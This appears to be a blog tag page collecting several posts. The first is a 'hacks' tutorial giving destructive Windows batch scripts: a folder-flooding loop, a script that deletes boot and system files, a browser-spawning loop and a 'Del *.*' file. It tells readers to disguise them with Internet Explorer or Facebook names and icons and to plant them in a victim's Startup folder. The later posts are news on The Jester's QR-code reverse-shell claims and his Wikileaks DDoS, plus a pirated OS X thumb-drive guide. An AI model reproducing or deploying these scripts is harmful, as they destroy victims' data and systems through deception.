Posts Tagged ‘hacks’

tv crime2

Now as you read this post you may think to yourself that you would like to try these scripts, well I will warn you again ‘Never Try These Hacks On Your Computer’. The safest way to try these is in a virtual machine, I recommend VMware player or VirtualBox, both are free for personal use.

We will be creating some batch files so you will need to ‘Show hidden files, folders and drives’ also untick the box ‘Hide extensions for known file types’

To do this type ‘folder options’ into the windows search bar  and you’ll be presented with the following dialog box.

folder options

 

 1) Crash A Computer With A Simple Link

This is a simple java script called “exploit”. This script can hang or crash your computer. This script just floods you up with the infinite number mailto:xxx windows. To prevent this you need to end the process of script before it runs out of your RAM. This can only be done by rebooting your computer before it fully utilizes your RAM.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

 Click Here. (http://tiny.cc/ibJUN)

 2) Make Countless Number Of Folders With A Single Click

A simple 3 line code can be very dangerous and also quite funny. So paste the below code in notepad and save it as IE.bat

@echo off

:top

md %random%

goto top

@echo off > this command makes your screen appears blank but actually making the countless number of folders in the background

Md %random% > md %random% is a command for creating folders with random names. ( md is a command in dos for making directories)

Goto top > goto top is a command for to send the control to :top causing an infinite loop.

To make this more enticing drop the batch file on the C drive and create a shortcut on the desktop. Now right click on the shortcut and select ‘Properties’

Now select ‘Change Icon’ and browse to C:\Program Files\Internet Explorer\iexplore.exe

This has now given you an Internet Explorer icon that will execute the malicious batch file, delete the original IE icon from the desktop.

 

3) Shut Down Your PC For Ever

This is the most malicious hack, this will delete ALL system files and will stop the victims PC from booting.

To perform this copy the below text to a text file and save it as ‘Shutdown.bat’

You can always do the same as the above hack and copy it to the victims PC and send a shortcut to the desktop.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

DON’T RUN THE BATCH FILE, YOU WONT BE ABLE TO RECOVER AFTER YOU RUN IT!!!

 4) RAM Crashing Trick.

Open notepad and type the following codes

:A

Start http://www.facebook.com

Goto A

save the file as facebook.bat

 This code will infinitely loop the browser to open http://www.facebook.com

5) Delete ALL System Files With Just 6 Character Command

Copy the following command in your notepad and save it as facebook.bat

Del *.*

So when the victim runs this file all the data will be deleted.

If you have access to the victims PC you can drop any of these batch files in a folder called ‘Start up’ this will then run when the user restarts their machine.

C:\Users\VICTIMS NAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

These are for educational purposes only, please do not use this information for malicious purposes. Caintech.co.uk take no responsibility for the actions of any individuals however feedback would be most appreciated.

 

With the huge popularity of smartphones, two-dimensional barcodes called QR codes are beloved by marketers and are being targeted by hackers and spammers. A user simply scans the QR code with a mobile device and is then directed to a website. The QR codes may be linked to coupons or special offers, but “if people see a random QR code that’s not connected to anything, just a sticker on the wall, they’re going to scan it because they want to know what the heck it is.” Damon Petraglia, Chartstone director of forensic and information security services, told Dark Reading, “The biggest risk is that people cannot deny their own curiosity.” As is becoming increasingly common, “attackers depend on that curiosity and the innate obfuscation of QR codes to craft their attacks.”

Curiosity is exactly what “pro-American hacker” The Jester was banking on when he changed his Twitter avatar into a QR code attack. There’s been plenty of ire and support in the past for what @th3j35t3r tweeted. The “hacktivist for good” is best known for DDoS attacks to disrupt pro-Jihadist sites as well as his contempt for Anonymous. The Jester blogged, “Anyone who scanned the QR code using their mobile device was taken to a jolly little greeting via their device’s default browser hosted on some free webspace. The greeting featured my original profile pic and the word ‘BOO!’ directly below it.”

He claims to have exploited the open-source software Webkit which is built into web browsers for mobile phones. This is precisely the same vulnerability exploited in Mobile Rat, turning Android into the “ultimate spy tool” as was demonstrated at the RSA conference. The Jester called the hack “a highly targeted and precise attack, against known bad guys.” The Register reported, “‘Enemies’ of the hacker listed as targets included @AnonymousIRC, @wikileaks, @anonyops, @barretbrownlol (the Twitter address of sometime Anonymous spokesman Barrett Brown) and @RepDanGordon (Rhode Island State Representative Dan Gordon) and others. Gordon made it onto The Jester’s hit list for his comments on Twitter referencing Anonymous in what The Jester saw as a sign of approval for the hacktivist group.”

“Creepy? Only if you are naughty,” The Jester blogged. The “‘curiosity pwned the cat’ sting went on for 5 days un-noticed,” during which the QR code was scanned over 1,200 times and “over 500 devices reverse shelled back to the listening server.” The hacker added this was a “Proof of Concept QR-Code based operation against known bad guys, the same bad guys that leak YOUR information, steal YOUR CC nums, and engage in terror plots around the world.” The Jester posted an encrypted 143-megabyte file with all the extracted data to the file-sharing site MediaFire.

“As far as LEA’s [law enforcement authorities] taking an interest in me, we will have to wait and see,” he told SecurityNewsDaily. After being “reminded that Twitter was receiving subpoenas for information on users, The Jester replied, ‘There is no identifying information held in my profile, and I never connect even close to directly. It’s a rule of mine’.”

It’s a hoax, a mind game, all “bluff and bluster,” Heise Security reported. “The technical details of the hack given are, however, not credible. The security vulnerability he claims to have exploited, CVE-2010-1807, has been in the public domain since autumn 2010 and was fixed in most browsers shortly thereafter. That does not sit well with his claimed success rate of 40 per cent of visitors. Similarly, he claims that a single exploit was able to bypass the security mechanisms present in multiple versions of iOS and Android. A more likely explanation is that The Jester is playing mind games with his enemies.”

But it’s not impossible as mobile malware via tainted QR codes have been spotted in the wild. AVG Technologies chief technology officer, Yuval Ben-Itzhak said, “Putting a malicious QR code sticker onto existing marketing material or replacing a website’s bona fide QR code with a malicious one could be enough to trick many unsuspecting people.”

Tomer Teller, security evangelist at Check Point Software Technologies, said it’s basically a “drive-by-download attack, where a user scans a bar code and is redirected to an unknown website. This website hosts modified exploits of the original jailbreak. Once visited, the user phone will be jailbroken and additional malware could be deployed [such as keyloggers and GPS trackers].” Teller told Dark Reading the attacks work against iOS and Android, but the Android “is more susceptible to QR code attacks.”

Source:  http://blogs.computerworld.com

There are tons of awesome live, bootable Linux systems, but what if you need to run OS X? Reader Will shows us how to put a portable version of OS X on a thumb drive and boot it on (most) Intel computers.

People put linux on their flash drives all the time. They also get hackintosh on their hard drives quite often. However, it’d be nice to be able to get the same live experience we get with Linux using OS X. With a distribution of OS X 10.6.2 called iPortable Snow, we can.

You’ll need an actual Mac to create the thumb drive (some Hackintoshes may work; mine didn’t). Search your favorite torrent site for iPortable Snow and download it. While it’s downloading, format your external hard drive or thumb drive (You’ll need at least an 8 GB thumb drive for this). Open up Disk Utility and select the drive you want to put OS X on. Go to the Partition tab and create one partition, formatted as Mac OS Extended (Journaled). Hit Options and make sure you’re using the Master Boot Record option. Then hit Apply to format the drive.

To read more about this fascinating subject have a look at Lifthacker.com

 

The distributed denial of service (DDoS) attack that took down Wikileaks as the site published secret U.S. embassy cables over the weekend could be the work of a single hacker, working for his own agenda.

The hacker, called the Jester (or th3j35t3r), describes himself as a “hacktivist for good” and posts the message “TANGO DOWN” after a successful attack, together with a link of the sites he takes down. The focus of his attacks, the Jester claims in his Twitter Bio, is “obstructing the lines of communication for terrorists, sympathizers, fixers, facilitators, oppressive regimes and other general bad guys.”

Recently, a couple of messages pointing to Wikileaks have appeared on Jester’s Twitter account. The most recent of them read “http://www.wikileaks.org – TANGO DOWN – for attempting to endanger the lives of our troops, ‘other assets’ & foreign relations #wikileaks #fail.

The Jester’s intentions are explained in detail on his blog, in a post dating from September. In the post, the Jester describes the flaws of Wikileaks’ “insurance policy,” which consisted of making available an encrypted file, supposedly containing the secret documents that were leaked afterward. The file is useless without a decryption key, which would be provided by Wikileaks in case someone takes the site down.

The Jester hints of having obtained some sensitive information about Wikileaks itself, but said he decided not to upload it on Wikileaks as he doesn’t believe the information would see the light of day. He then provides an encrypted file of his own, claiming the information is contained within — again, as “insurance.”

While it is entirely possible for one experienced and resourceful hacker to take down a site — even a fairly large one — by a DDoS attack on his own, it’s not easy to prove whether the Jester is really behind the attack and, if he is, whether he was working on his own or if he had help. We’re sure the story will only give more fuel to the various rumors that are flying around Wikileaks being taken down.

What do you think? Is the most recent attack on Wikileaks the deed of a single person, or is a larger, more powerful organization behind it?